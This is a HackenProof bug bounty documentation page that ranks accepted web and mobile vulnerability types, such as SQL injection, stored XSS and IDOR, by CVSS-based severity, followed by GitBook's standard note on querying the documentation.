> For the complete documentation index, see [llms.txt](https://docs.hackenproof.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.hackenproof.com/bug-bounty/vulnerability-classification/web-and-mobile.md).

# Web & Mobile

We use the [Common Vulnerability Scoring System](https://www.first.org/cvss/user-guide) to assess the severity of reported vulnerabilities. Below is a classification of accepted issues and their typical severity ratings.

| **Severity**    | **Example Vulnerabilities**                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
| --------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 🔴 **Critical** | <ul><li>Payments manipulation</li><li>SQL Injection (SQLi)</li><li>Remote Code Execution (RCE)</li><li>Business logic flaws causing loss of user funds or assets</li><li>Command Injection</li></ul>                                                                                                                                                                                                                                                                                                                                                                                                                                         |
| 🟠 **High**     | <ul><li>Subdomain takeover (on domains linked to wallets or sensitive assets)</li><li>Stored Cross-Site Scripting (XSS)</li><li>Server-Side Request Forgery (SSRF)</li><li>Leakage of sensitive user information affecting >15% of users</li><li>File Inclusion vulnerabilities</li><li><strong>Authentication Bypass:</strong> Full or partial bypass of login, session management, or auth tokens.</li><li><strong>Insecure Direct Object Reference (IDOR):</strong> Accessing unauthorized user data/resources.</li><li><strong>Privilege Escalation</strong> (Medium–High): User accessing or performing admin-only functions.</li></ul> |
| 🟡 **Medium**   | <ul><li>Reflected Cross-Site Scripting (XSS)</li><li>Subdomain takeover (non-wallet domains)</li><li>Two-Factor Authentication (2FA) Bypass</li><li>Leakage of sensitive user information affecting 3%–15% of users</li><li>Cross-Site Request Forgery (CSRF)</li><li>Misconfigured exported Android components (e.g., unvalidated deeplinks, WebView loading attacker-controlled URLs leading to session token leakage)</li></ul>                                                                                                                                                                                                           |
| 🟢 **Low**      | <ul><li>HTML Injection</li><li>Subdomain takeovers <strong>without business impact</strong> (e.g., over a third-party service without access to cookies, auth, or internal APIs).</li><li>No rate limiting on form submissions or public endpoints</li><li>Content Spoofing</li><li>Broken Link Hijacking</li></ul>                                                                                                                                                                                                                                                                                                                          |

Please review the [Out-of-Scope Vulnerabilities](/bug-bounty/vulnerability-classification/web-and-mobile/out-of-scope-bugs.md) before submitting.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://docs.hackenproof.com/bug-bounty/vulnerability-classification/web-and-mobile.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.